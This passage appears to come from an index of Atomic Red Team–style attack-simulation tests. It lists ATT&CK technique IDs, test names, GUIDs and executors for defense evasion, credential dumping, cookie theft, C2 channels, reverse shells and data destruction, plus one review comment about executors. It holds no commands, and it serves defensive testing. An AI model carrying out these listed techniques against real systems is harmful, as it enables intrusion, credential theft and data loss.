527 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 51 Delete Microsoft Defender ASR Rules - InTune eea0a6c2-84e9-4e8c-a242-ac585d28d0d1 powershell
528 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 52 Delete Microsoft Defender ASR Rules - GPO 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50 powershell
529 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 53 AMSI Bypass - Create AMSIEnable Reg Key 728eca7b-0444-4f6f-ac36-437e3d751dc0 powershell
530 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 54 Disable EventLog-Application Auto Logger Session Via Registry - Cmd 653c6e17-14a2-4849-851d-f1c0cc8ea9ab command_prompt
531 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 55 Disable EventLog-Application Auto Logger Session Via Registry - PowerShell da86f239-9bd3-4e85-92ed-4a94ef111a1c powershell
532 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 56 Disable EventLog-Application ETW Provider Via Registry - Cmd 1cac9b54-810e-495c-8aac-989e0076583b command_prompt
533 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 57 Disable EventLog-Application ETW Provider Via Registry - PowerShell 8f907648-1ebf-4276-b0f0-e2678ca474f0 powershell
534 defense-evasion T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
535 defense-evasion T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
536 defense-evasion T1055.012 Process Injection: Process Hollowing 3 Process Hollowing in Go using CreateProcessW WinAPI c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a powershell
769 privilege-escalation T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
770 privilege-escalation T1547.005 Boot or Logon Autostart Execution: Security Support Provider 2 Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry de3f8e74-3351-4fdb-a442-265dbf231738 powershell
771 privilege-escalation T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
privilege-escalation T1543.004 Create or Modify System Process: Launch Daemon 2 Launch Daemon - Users Directory 6f899f9d-8a8e-4143-89a5-26fc2c3ec438 bash
772 privilege-escalation T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
773 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
774 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
854 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
855 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 18 Allowing custom application to execute during new RDP logon session b051b3c0-66e7-4a81-916d-e6383bd3a669 command_prompt
856 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 19 Creating Boot Verification Program Key for application execution during successful boot 6e1666d5-3f2b-4b9a-80aa-f011322380d4 command_prompt
857 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 20 Add persistence via Windows Context Menu de47f4a0-2acb-416d-9a6b-cee584a4c4d1 command_prompt
858 privilege-escalation T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
859 privilege-escalation T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
860 privilege-escalation T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
1005 execution T1106 Native API 3 WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique 7ec5b74e-8289-4ff2-a162-b6f286a33abd powershell
1006 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
1007 execution T1106 Native API 5 Run Shellcode via Syscall in Go ae56083f-28d0-417d-84da-df4242da1f7c powershell
1008 execution T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT 1 AutoHotKey script execution 7b5d350e-f758-43cc-a761-8e3f6b052a03 powershell
1009 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
1010 execution T1059 Command and Scripting Interpreter 1 AutoIt Script Execution a9b93f17-31cb-435d-a462-5e838a2a6026 powershell
1011 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
1072 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
1073 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 5 Command Prompt read contents from CMD file and execute df81db1b-066c-4802-9bc8-b6d030c3ba8e command_prompt
1074 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 6 Command prompt writing script to file then executes it 00682c9f-7df4-4df8-950b-6dcaaa3ad9af command_prompt
1075 execution T1651 Cloud Administration Command 1 AWS Run Command (and Control) a3cc9c95-c160-4b86-af6f-84fba87bfd30 powershell
1076 execution T1059.005 Command and Scripting Interpreter: Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
1077 execution T1059.005 Command and Scripting Interpreter: Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
1078 execution T1059.005 Command and Scripting Interpreter: Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
1079 execution T1648 Serverless Execution 1 Lambda Function Hijack 87a4a141-c2bb-49d1-a604-8679082d8b91 powershell
1080 execution T1569.002 System Services: Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
1081 execution T1569.002 System Services: Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
1082 execution T1569.002 System Services: Service Execution 3 psexec.py (Impacket) edbcd8c9-3639-4844-afad-455c91e95a35 bash
1157 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
1158 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 2 Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry de3f8e74-3351-4fdb-a442-265dbf231738 powershell
1159 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
persistence T1543.004 Create or Modify System Process: Launch Daemon 2 Launch Daemon - Users Directory 6f899f9d-8a8e-4143-89a5-26fc2c3ec438 bash
1160 persistence T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
1161 persistence T1505.003 Server Software Component: Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
1162 persistence T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1230 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
1231 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 18 Allowing custom application to execute during new RDP logon session b051b3c0-66e7-4a81-916d-e6383bd3a669 command_prompt
1232 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 19 Creating Boot Verification Program Key for application execution during successful boot 6e1666d5-3f2b-4b9a-80aa-f011322380d4 command_prompt
1233 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 20 Add persistence via Windows Context Menu de47f4a0-2acb-416d-9a6b-cee584a4c4d1 command_prompt
1234 persistence T1136.003 Create Account: Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
1235 persistence T1136.003 Create Account: Cloud Account 2 Azure AD - Create a new user e62d23ef-3153-4837-8625-fa4a3829134d powershell
1236 persistence T1136.003 Create Account: Cloud Account 3 Azure AD - Create a new user via Azure CLI 228c7498-be31-48e9-83b7-9cb906504ec8 powershell
1355 command-and-control T1219 Remote Access Software 12 RustDesk Files Detected Test on Windows f1641ba9-919a-4323-b74f-33372333bf0e powershell
1356 command-and-control T1219 Remote Access Software 13 Splashtop Execution b025c580-029e-4023-888d-a42710d76934 powershell
1357 command-and-control T1219 Remote Access Software 14 Splashtop Streamer Execution 3e1858ee-3550-401c-86ec-5e70ed79295b powershell
1358 command-and-control T1219 Remote Access Software 15 Microsoft App Quick Assist Execution 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75 powershell
1359 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
1360 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
1361 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
1362 command-and-control T1572 Protocol Tunneling 4 run ngrok 4cdc9fc7-53fb-4894-9f0c-64836943ea60 powershell
1363 command-and-control T1572 Protocol Tunneling 5 Microsoft Dev tunnels (Linux/macOS) 9f94a112-1ce2-464d-a63b-83c1f465f801 bash
1364 command-and-control T1572 Protocol Tunneling 6 VSCode tunnels (Linux/macOS) b877943f-0377-44f4-8477-f79db7f07c4d sh
1365 command-and-control T1090.003 Proxy: Multi-hop Proxy 1 Psiphon 14d55ca0-920e-4b44-8425-37eedd72b173 powershell
1366 command-and-control T1090.003 Proxy: Multi-hop Proxy 2 Tor Proxy Usage - Windows 7b9d85e5-c4ce-4434-8060-d3de83595e69 powershell
1367 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu/FreeBSD 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
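Review bot: rows 1363 and 1364 add two sibling T1572 tests for the same platforms (Linux/macOS) but under different executors, `bash` for "Microsoft Dev tunnels (Linux/macOS)" and `sh` for "VSCode tunnels (Linux/macOS)". Unless the Dev tunnels test actually depends on bash-only syntax, declare both with `sh` so the two tunnel tests are invoked the same way and their execution reports line up in the index.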
1372 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
1373 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
1374 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
1375 command-and-control T1095 Non-Application Layer Protocol 4 Linux ICMP Reverse Shell using icmp-cnc 8e139e1f-1f3a-4be7-901d-afae9738c064 manual
1376 command-and-control T1071.001 Application Layer Protocol: Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
1377 command-and-control T1071.001 Application Layer Protocol: Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
1378 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
1469 collection T1530 Data from Cloud Storage Object 3 AWS - Scan for Anonymous Access to S3 979356b9-b588-4e49-bba4-c35517c484f5 sh
1470 collection T1005 Data from Local System 1 Search files of interest and save them to a single zip file (Windows) d3d9af44-b8ad-4375-8b0a-4bff4b7e419c powershell
1471 collection T1005 Data from Local System 2 Find and dump sqlite databases (Linux) 00cbb875-7ae4-4cf1-b638-e543fd825300 bash
1472 collection T1005 Data from Local System 3 Copy Apple Notes database files using AppleScript cfb6d400-a269-4c06-a347-6d88d584d5f7 sh
1473 collection T1560.002 Archive Collected Data: Archive via Library 1 Compressing data using GZip in Python (FreeBSD/Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 sh
1474 collection T1560.002 Archive Collected Data: Archive via Library 2 Compressing data using bz2 in Python (FreeBSD/Linux) c75612b2-9de0-4d7c-879c-10d7b077072d sh
1475 collection T1560.002 Archive Collected Data: Archive via Library 3 Compressing data using zipfile in Python (FreeBSD/Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 sh
1487 collection T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
1488 lateral-movement T1021.005 Remote Services:VNC 1 Enable Apple Remote Desktop Agent 8a930abe-841c-4d4f-a877-72e9fe90b9ea sh
1489 lateral-movement T1021.004 Remote Services: SSH 1 ESXi - Enable SSH via PowerCLI 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec powershell
1490 lateral-movement T1021.004 Remote Services: SSH 2 ESXi - Enable SSH via VIM-CMD 280812c8-4dae-43e9-a74e-1d08ab997c0e command_prompt
1491 lateral-movement T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1492 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
1493 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
1542 credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
1543 credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
1544 credential-access T1539 Steal Web Session Cookie 3 Steal Chrome Cookies via Remote Debugging (Mac) e43cfdaf-3fb8-4a45-8de0-7eee8741d072 bash
1545 credential-access T1539 Steal Web Session Cookie 4 Steal Chrome v127+ cookies via Remote Debugging (Windows) b647f4ee-88de-40ac-9419-f17fac9489a7 powershell
1546 credential-access T1539 Steal Web Session Cookie 5 Copy Safari BinaryCookies files using AppleScript e57ba07b-3a33-40cd-a892-748273b9b49a sh
1547 credential-access T1003.002 OS Credential Dumping: Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
1548 credential-access T1003.002 OS Credential Dumping: Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
1549 credential-access T1003.002 OS Credential Dumping: Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
1558 credential-access T1555.001 Credentials from Password Stores: Keychain 1 Keychain Dump 88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6 sh
1559 credential-access T1555.001 Credentials from Password Stores: Keychain 2 Export Certificate Item(s) 1864fdec-ff86-4452-8c30-f12507582a93 sh
1560 credential-access T1555.001 Credentials from Password Stores: Keychain 3 Import Certificate Item(s) into Keychain e544bbcb-c4e0-4bd0-b614-b92131635f59 sh
1561 credential-access T1555.001 Credentials from Password Stores: Keychain 4 Copy Keychain using cat utility 5c32102a-c508-49d3-978f-288f8a9f6617 sh
1562 credential-access T1003.004 OS Credential Dumping: LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
1563 credential-access T1003.004 OS Credential Dumping: LSA Secrets 2 Dump Kerberos Tickets from LSA using dumper.ps1 2dfa3bff-9a27-46db-ab75-7faefdaca732 powershell
1564 credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
1660 credential-access T1649 Steal or Forge Authentication Certificates 1 Staging Local Certificates via Export-Certificate eb121494-82d1-4148-9e2b-e624e03fbf3d powershell
1661 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
1662 credential-access T1552.003 Unsecured Credentials: Bash History 2 Search Through sh History d87d3b94-05b4-40f2-a80f-99864ffa6803 sh
1663 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 37807632-d3da-442e-8c2e-00f44928ff8f sh
1664 credential-access T1552.001 Unsecured Credentials: Credentials In Files 2 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
1665 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
1666 credential-access T1552.001 Unsecured Credentials: Credentials In Files 4 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
1674 credential-access T1552.001 Unsecured Credentials: Credentials In Files 12 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials aaa87b0e-5232-4649-ae5c-f1724a4b2798 powershell
1675 credential-access T1552.001 Unsecured Credentials: Credentials In Files 13 List Credential Files via PowerShell 0d4f2281-f720-4572-adc8-d5bb1618affe powershell
1676 credential-access T1552.001 Unsecured Credentials: Credentials In Files 14 List Credential Files via Command Prompt b0cdacf6-8949-4ffe-9274-a9643a788e55 command_prompt
1677 credential-access T1552.001 Unsecured Credentials: Credentials In Files 15 Find Azure credentials a8f6148d-478a-4f43-bc62-5efee9f931a4 sh
1678 credential-access T1552.001 Unsecured Credentials: Credentials In Files 16 Find GCP credentials aa12eb29-2dbb-414e-8b20-33d34af93543 sh
1679 credential-access T1552.001 Unsecured Credentials: Credentials In Files 17 Find OCI credentials 9d9c22c9-fa97-4008-a204-478cf68c40af sh
1680 credential-access T1528 Steal Application Access Token 1 Azure - Dump All Azure Key Vaults with Microburst 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea powershell
1681 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
1682 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
1774 discovery T1087.001 Account Discovery: Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
1775 discovery T1087.001 Account Discovery: Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
1776 discovery T1087.001 Account Discovery: Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
1777 discovery T1087.001 Account Discovery: Local Account 11 ESXi - Local Account Discovery via ESXCLI 9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c command_prompt
1778 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
1779 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (FreeBSD) e129d73b-3e03-4ae9-bf1e-67fc8921e0fd sh
1780 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
1781 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment (MacOS) Detect Virtualization Environment via ioreg a960185f-aef6-4547-8350-d1ce16680d09 sh
1782 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 5 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
1783 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 6 Detect Virtualization Environment using sysctl (hw.model) 6beae646-eb4c-4730-95be-691a4094408c sh
1784 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 7 Check if System Integrity Protection is enabled 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945 sh
1785 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 8 Detect Virtualization Environment using system_profiler e04d2e89-de15-4d90-92f9-a335c7337f0f sh
1786 discovery T1069.002 Permission Groups Discovery: Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
1787 discovery T1069.002 Permission Groups Discovery: Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
1788 discovery T1069.002 Permission Groups Discovery: Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
1872 discovery T1082 System Information Discovery 36 Display volume shadow copies with "vssadmin" 7161b085-816a-491f-bab4-d68e974b7995 command_prompt
1873 discovery T1082 System Information Discovery 37 Identify System Locale and Regional Settings with PowerShell ce479c1a-e8fa-42b2-812a-96b0f2f4d28a command_prompt
1874 discovery T1082 System Information Discovery 38 Enumerate Available Drives via gdr c187c9bc-4511-40b3-aa10-487b2c70b6a5 command_prompt
1875 discovery T1082 System Information Discovery 39 Discover OS Product Name via Registry be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7 command_prompt
1876 discovery T1082 System Information Discovery 40 Discover OS Build Number via Registry acfcd709-0013-4f1e-b9ee-bc1e7bafaaec command_prompt
1877 discovery T1016.002 System Network Configuration Discovery: Wi-Fi Discovery 1 Enumerate Stored Wi-Fi Profiles And Passwords via netsh 53cf1903-0fa7-4177-ab14-f358ae809eec command_prompt
1878 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
1879 discovery T1497.003 Time Based Evasion 1 Delay execution with ping 8b87dd03-8204-478c-bac3-3959f6528de3 sh
1957 discovery T1614.001 System Location Discovery: System Language Discovery 6 Discover System Language by Environment Variable Query cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a sh
1958 discovery T1614.001 System Location Discovery: System Language Discovery 7 Discover System Language with dism.exe 69f625ba-938f-4900-bdff-82ada3df5d9c command_prompt
1959 discovery T1614.001 System Location Discovery: System Language Discovery 8 Discover System Language by Windows API Query e39b99e9-ce7f-4b24-9c88-0fbad069e6c6 command_prompt
1960 discovery T1614.001 System Location Discovery: System Language Discovery 9 Discover System Language with WMIC 4758003d-db14-4959-9c0f-9e87558ac69e command_prompt
1961 discovery T1614.001 System Location Discovery: System Language Discovery 10 Discover System Language with Powershell 1f23bfe8-36d4-49ce-903a-19a1e8c6631b powershell
1962 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
1963 discovery T1012 Query Registry 2 Query Registry with Powershell cmdlets 0434d081-bb32-42ce-bcbb-3548e4f2628f powershell
1964 discovery T1012 Query Registry 3 Enumerate COM Objects in Registry with Powershell 0d80d088-a84c-4353-af1a-fc8b439f1564 powershell
1979 discovery T1518.001 Software Discovery: Security Software Discovery 10 Security Software Discovery - Windows Firewall Enumeration 9dca5a1d-f78c-4a8d-accb-d6de67cfed6b powershell
1980 discovery T1518.001 Software Discovery: Security Software Discovery 11 Get Windows Defender exclusion settings using WMIC e31564c8-4c60-40cd-a8f4-9261307e8336 command_prompt
1981 discovery T1526 Cloud Service Discovery 1 Azure - Dump Subscription Data with MicroBurst 1e40bb1d-195e-401e-a86b-c192f55e005c powershell
1982 discovery T1526 Cloud Service Discovery 2 AWS - Enumerate common cloud services aa8b9bcc-46fa-4a59-9237-73c7b93a980c powershell
1983 discovery T1526 Cloud Service Discovery 3 Azure - Enumerate common cloud services 58f57c8f-db14-4e62-a4d3-5aaf556755d7 powershell
1984 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
1985 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
1986 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
2014 discovery T1046 Network Service Discovery 9 Network Service Discovery for Containers 06eaafdb-8982-426e-8a31-d572da633caa sh
2015 discovery T1046 Network Service Discovery 10 Port-Scanning /24 Subnet with PowerShell 05df2a79-dba6-4088-a804-9ca0802ca8e4 powershell
2016 discovery T1046 Network Service Discovery 11 Remote Desktop Services Discovery via PowerShell 9e55750e-4cbf-4013-9627-e9a045b541bf powershell
2017 discovery T1046 Network Service Discovery 12 Port Scan using nmap (Port range) 0d5a2b03-3a26-45e4-96ae-89485b4d1f97 sh
2018 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
2019 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
2020 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
2027 discovery T1124 System Time Discovery 3 System Time Discovery in FreeBSD/macOS f449c933-0891-407f-821e-7916a21a1a6f sh
2028 discovery T1124 System Time Discovery 4 System Time Discovery W32tm as a Delay d5d5a6b0-0f92-42d8-985d-47aafa2dd4db command_prompt
2029 discovery T1124 System Time Discovery 5 System Time with Windows time Command 53ead5db-7098-4111-bb3f-563be390e72e command_prompt
2030 discovery T1124 System Time Discovery 6 Discover System Time Zone via Registry 25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47 command_prompt
2031 reconnaissance T1592.001 Gather Victim Host Information: Hardware 1 Enumerate PlugNPlay Camera d430bf85-b656-40e7-b238-42db01df0183 powershell
2032 reconnaissance T1595.003 Active Scanning: Wordlist Scanning 1 Web Server Wordlist Scan 89a83c3e-0b39-4c80-99f5-c2aa084098bd powershell
2033 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
2034 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
2035 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
2039 impact T1489 Service Stop 7 Linux - Stop service by killing process using pkill 08b4718f-a8bf-4bb5-a552-294fc5178fea sh
2040 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
2041 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
2042 impact T1491.001 Defacement: Internal Defacement 3 ESXi - Change Welcome Message on Direct Console User Interface (DCUI) 30905f21-34f3-4504-8b4c-f7a5e314b810 command_prompt
2043 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
2044 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
2045 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
2063 impact T1485 Data Destruction 2 FreeBSD/macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 sh
2064 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
2065 impact T1485 Data Destruction 4 GCP - Delete Bucket 4ac71389-40f4-448a-b73f-754346b3f928 sh
2066 impact T1485 Data Destruction 5 ESXi - Delete VM Snapshots 1207ddff-f25b-41b3-aa0e-7c26d2b546d1 command_prompt
2067 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
2068 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
2069 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
2090 impact T1529 System Shutdown/Reboot 12 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
2091 impact T1529 System Shutdown/Reboot 13 ESXi - Terminates VMs using pkill 987c9b4d-a637-42db-b1cb-e9e242c3991b command_prompt
2092 impact T1529 System Shutdown/Reboot 14 ESXi - Avoslocker enumerates VMs and forcefully kills VMs 189f7d6e-9442-4160-9bc3-5e4104d93ece command_prompt
